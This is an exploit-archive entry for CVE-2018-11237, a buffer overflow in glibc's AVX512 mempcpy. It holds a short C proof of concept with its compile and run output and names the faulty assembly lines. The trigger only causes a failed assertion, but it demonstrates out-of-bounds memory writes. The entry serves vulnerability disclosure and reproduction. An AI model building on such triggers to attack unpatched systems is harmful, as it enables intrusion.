GNU glibc < 2.27 - Local Buffer Overflow
| EKU-ID: 7638 | CVE: 2018-11237 | OSVDB-ID: |
| Author: JameelNabbo | Published: 2018-05-28 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 7638 | CVE: 2018-11237 | OSVDB-ID: |
| Author: JameelNabbo | Published: 2018-05-28 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
# Exploit Title: GNU glibc < 2.27 - Local Buffer Overflow
# Date: 2018-05-24
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com <http://jameelnabbo.com/>
# Vendor Homepage: http://www.gnu.org/ <http://www.gnu.org/>
# CVE: CVE-2018-11237
# POC:
$ cat mempcpy.c
#define _GNU_SOURCE 1
#include <string.h>
#include <assert.h>
#define N 97699
char a[N];
char b[N+128];
int
main (void)
{
memset (a, 'x', N);
char *c = mempcpy (b, a, N);
assert (*c == 0);
}
$ gcc -g mempcpy.c -o mempcpy -fno-builtin-mempcpy
$ ./mempcpy
mempcpy: mempcpy.c:14: main: Assertion `*c == 0' failed.
The problem is these two lines in memmove-avx512-no-vzeroupper.S:
vmovups %zmm4, (%rax)
vmovups %zmm5, 0x40(%rax)
For mempcpy, %rax points to the end of the buffer.